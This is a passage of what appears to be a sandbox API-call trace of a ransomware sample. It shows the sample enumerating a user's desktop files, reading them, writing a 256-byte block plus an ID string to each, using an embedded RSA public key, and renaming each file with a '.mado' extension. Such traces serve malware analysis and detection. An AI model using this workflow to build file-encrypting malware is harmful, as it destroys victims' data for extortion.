lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.044] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.044] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.044] CloseHandle (hObject=0x63c) returned 1 [0205.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7KMqt8ZHYw9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\7kmqt8zhyw9.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7KMqt8ZHYw9.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\7kmqt8zhyw9.bmp.mado")) returned 1 [0205.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf34cdf60, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xec5871e0, ftLastAccessTime.dwHighDateTime=0x1d5e47a, ftLastWriteTime.dwLowDateTime=0xec5871e0, ftLastWriteTime.dwHighDateTime=0x1d5e47a, nFileSizeHigh=0x0, nFileSizeLow=0x5488, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nX515fp0xXoAeKg.mp3", cAlternateFileName="NX515F~1.MP3")) returned 1 [0205.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.047] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\nX515fp0xXoAeKg.mp3") returned=".mp3" [0205.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\nX515fp0xXoAeKg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\nx515fp0xxoaekg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.048] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=21640) returned 1 [0205.048] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.050] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5462, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.050] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.051] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x5488, lpOverlapped=0x0) returned 1 [0205.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.052] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.052] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.053] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.053] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.053] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.053] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.053] GetLastError () returned 0x0 [0205.053] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.053] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.053] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.053] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.053] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.053] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.054] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5488, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.054] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.054] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.054] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.054] CloseHandle (hObject=0x63c) returned 1 [0205.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0205.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.055] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\nX515fp0xXoAeKg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\nx515fp0xxoaekg.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\nX515fp0xXoAeKg.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\nx515fp0xxoaekg.mp3.mado")) returned 1 [0205.056] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfe97ba0, ftCreationTime.dwHighDateTime=0x1d5e7e7, ftLastAccessTime.dwLowDateTime=0x5ad73c40, ftLastAccessTime.dwHighDateTime=0x1d5dd8d, ftLastWriteTime.dwLowDateTime=0x5ad73c40, ftLastWriteTime.dwHighDateTime=0x1d5dd8d, nFileSizeHigh=0x0, nFileSizeLow=0xd912, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TYK11thUT8O9w.docx", cAlternateFileName="TYK11T~1.DOC")) returned 1 [0205.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.056] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\TYK11thUT8O9w.docx") returned=".docx" [0205.056] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\TYK11thUT8O9w.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\tyk11thut8o9w.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.057] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=55570) returned 1 [0205.057] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.059] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd8ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.059] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.061] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xd912, lpOverlapped=0x0) returned 1 [0205.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.064] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.064] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.065] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.065] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.065] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.065] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.065] GetLastError () returned 0x0 [0205.065] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.065] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.065] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.065] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.065] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.066] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.066] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd912, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.066] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.066] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.066] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.067] CloseHandle (hObject=0x63c) returned 1 [0205.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0205.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.068] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\TYK11thUT8O9w.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\tyk11thut8o9w.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\TYK11thUT8O9w.docx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\tyk11thut8o9w.docx.mado")) returned 1 [0205.069] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc59df980, ftCreationTime.dwHighDateTime=0x1d5e349, ftLastAccessTime.dwLowDateTime=0xbd8fc9d0, ftLastAccessTime.dwHighDateTime=0x1d5e54c, ftLastWriteTime.dwLowDateTime=0xbd8fc9d0, ftLastWriteTime.dwHighDateTime=0x1d5e54c, nFileSizeHigh=0x0, nFileSizeLow=0xef26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ydu yo7COcjyeZRwa.ppt", cAlternateFileName="YDUYO7~1.PPT")) returned 1 [0205.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\ydu yo7COcjyeZRwa.ppt") returned=".ppt" [0205.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\ydu yo7COcjyeZRwa.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\ydu yo7cocjyezrwa.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.070] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=61222) returned 1 [0205.070] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.072] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xef00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.072] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.073] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xef26, lpOverlapped=0x0) returned 1 [0205.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.074] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.075] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.075] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.075] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.075] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.075] GetLastError () returned 0x0 [0205.075] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.075] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.075] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.075] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.075] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.076] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.076] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xef26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.076] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.076] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.076] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.077] CloseHandle (hObject=0x63c) returned 1 [0205.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0205.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.078] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\ydu yo7COcjyeZRwa.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\ydu yo7cocjyezrwa.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\ydu yo7COcjyeZRwa.ppt.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\ydu yo7cocjyezrwa.ppt.mado")) returned 1 [0205.079] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc59df980, ftCreationTime.dwHighDateTime=0x1d5e349, ftLastAccessTime.dwLowDateTime=0xbd8fc9d0, ftLastAccessTime.dwHighDateTime=0x1d5e54c, ftLastWriteTime.dwLowDateTime=0xbd8fc9d0, ftLastWriteTime.dwHighDateTime=0x1d5e54c, nFileSizeHigh=0x0, nFileSizeLow=0xef26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ydu yo7COcjyeZRwa.ppt", cAlternateFileName="YDUYO7~1.PPT")) returned 0 [0205.079] FindClose (in: 